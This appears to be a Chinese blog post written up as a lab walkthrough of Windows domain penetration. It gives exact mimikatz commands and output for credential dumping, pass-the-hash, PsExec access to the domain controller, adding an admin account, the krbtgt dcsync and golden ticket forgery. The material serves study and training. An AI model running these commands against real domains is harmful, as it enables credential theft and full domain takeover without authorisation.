• 内网渗透靶场测试:(二)hash传递和黄金票据


      内网往往有好多台服务器组成集群,为了方便管理,windwos系统可以通过域批量管理;管理员直接操作的服务器称为控制器,能操控域里面所有的节点,概念上类似于master;其余节点可通过master批量被操作,概念上类似于slave,俗称客户机;拿下控制节点,就等于拿下了整个域;

      1、这里假设先拿下了一台客户机,远程桌面登陆,上传猕猴桃,先扫描内存,找到域下面的administrator账号,:

    Authentication Id : 0 ; 381160 (00000000:0005d0e8)

    Session           : RemoteInteractive from 3

    User Name         : administrator

    Domain            : ZKAQ

    Logon Server      : DC

    Logon Time        : 2020/6/20 19:36:09

    SID               : S-1-5-21-4098506371-3349406080-1400905760-500

    msv :

    [00000003] Primary

    * Username : Administrator

    * Domain   : ZKAQ

    * NTLM     : 61465a991b168727b65b3644aab823cd

    * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d

    [00010000] CredentialKeys

    * NTLM     : 61465a991b168727b65b3644aab823cd

    * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d

    tspkg :

    wdigest :

    * Username : Administrator

    * Domain   : ZKAQ

    * Password : (null)

    kerberos :

    * Username : administrator

    * Domain   : ZKAQ.CN

    * Password : (null)

    ssp :

    credman :

    这里有几个关键信息:(1)domain名字:ZKAQ.CN  (2)账号的NTLM值,下面用该值做hash传递(数据库一般也不会存密码,都是比对hash值,所以这里直接用hash值,没必要用明文密码);构造的命令:sekurlsa::pth /user:administrator /domain:"ZKAQ.CN" /ntlm:61465a991b168727b65b3644aab823cd; 命令成功执行后,重新生成一个cmd窗口;尝试用dir命令,发现能返回控制器C盘的文件;这里说明hash传递是成功的!

     2、打开控制器的cmd,命令如下:PsExec.exe \DC.ZKAQ.CN cmd , 成功打开了控制器的cmd;

    C盘下和刚才在客户机打开看到的一样:

     

    创建用户,并加入管理员组(不过动静有点大,容易被察觉,可以试试用黄金票据)

     

    成功登陆域控制器:

     

    3、(1)登陆域控制器后,继续上传猕猴桃,运行lsadump::dcsync /user:krbtgt得到结果如下:

    mimikatz # lsadump::dcsync /user:krbtgt
    [DC] 'zkaq.cn' will be the domain
    [DC] 'DC.zkaq.cn' will be the DC server
    [DC] 'krbtgt' will be the user account

    Object RDN : krbtgt

    ** SAM ACCOUNT **

    SAM Username : krbtgt
    Account Type : 30000000 ( USER_OBJECT )
    User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
    Account expiration :
    Password last change : 2020/6/14 23:47:11
    Object Security ID : S-1-5-21-4098506371-3349406080-1400905760-502
    Object Relative ID : 502

    Credentials:
    Hash NTLM: 9f7afad7acc9f72b7e338b908795b7da
    ntlm- 0: 9f7afad7acc9f72b7e338b908795b7da
    lm - 0: 614731ed84bc1bf9f60798aa91f297bd

    其中两个关键的信息:

    SID:S-1-5-21-4098506371-3349406080-1400905760-502

    hash NTLM:9f7afad7acc9f72b7e338b908795b7da

    (2)制作黄金票据,在客户机运行:kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.kiribi

     加载黄金票据:kerberos::ptt administrator.kiribi

    再在客户机开个普通的窗口运行KLIST,发现黄金票据的有效期到2030年;

     (4)在客户机的普通窗口运行dir \dc.zkaq.cnc$,能正常查看C盘的文件,说明黄金票据生效!之前在域空机器建的diqizi账户可以删了;

    总结:关键的地方

    1、hash传递:用猕猴桃扫描内存,得到的是hash后的密码,这里没必要硬杠去破解,直接用现成的hash值发送到域控制器去验证,因为数据库一般也不会存明文,而是存hash值;

    2、hash传递成功后,在新的cmd中用windows官方提供的PsExec.exe \DC.ZKAQ.CN cmd 在域控制器中再生成新cmd,这时已经是域控制器的administrator权限了,可以添加自己的用户,再用远程登陆连接;

    3、登陆域控制器,运行猕猴桃,找到sid和hash NTLM;然后在客户机的猕猴桃制作和加载黄金票据,最后在客户机的普通cmd窗口验证;

    4、内网渗透核心步骤和操作思路总结如下:

    参考:1、windows域环境下认证和攻击初识:https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247486939&idx=1&sn=5df5d91671322fa34e7db4e0b8374ff7&chksm=9b392b6aac4ea27c05ad3cbfeed07343bd622eeeec98a2d2eda914186a8284c905f95a5da3e5&mpshare=1&scene=1&srcid=0911EyIZvEWtzxP4ivQvlIA5&sharer_sharetime=1599805704289&sharer_shareid=9fbc36fac1066ad4fc975c7ee94f97d6&key=2008e9df245ac54d8ce509c19d2dc2bd9464546910aa2d976233038414a70a227661d94f0e66bc52e6298c52b80858c65ede77d09554df46402880aafb26d6c8b0737b3468fe0abaa52893fda1529784b354088c1eeefde0d6d411ae6a0f919e69d44c9bd409ab090b4571c0e5f22abfd384d40e3337de85168949cb4bb2572c&ascene=1&uin=MTc3OTQ3MTE4MA%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_CN&exportkey=A1ChxrX8KG7hv0emAnoIhGE%3D&pass_ticket=bFhSb3sGn5YFTHvXo9T0hQln%2BBVHa2hhRy1ISm1g4QabR2S9JHHYW1bCAF0RZrHz&wx_header=0

  • 相关阅读:
    JavaScript引用类型
    Java08_方法
    网络爬虫(一)
    openCV(四)——鼠标绘制
    openCV(三)——视频
    openCV(二)——基础绘制函数
    openCV(一) 读取保存图像
    JAVA07-数组
    JAVA06-while循环,do while循环
    JAVA05-switch多重选择
  • 原文地址:https://www.cnblogs.com/theseventhson/p/13587108.html
Copyright © 2020-2023  润新知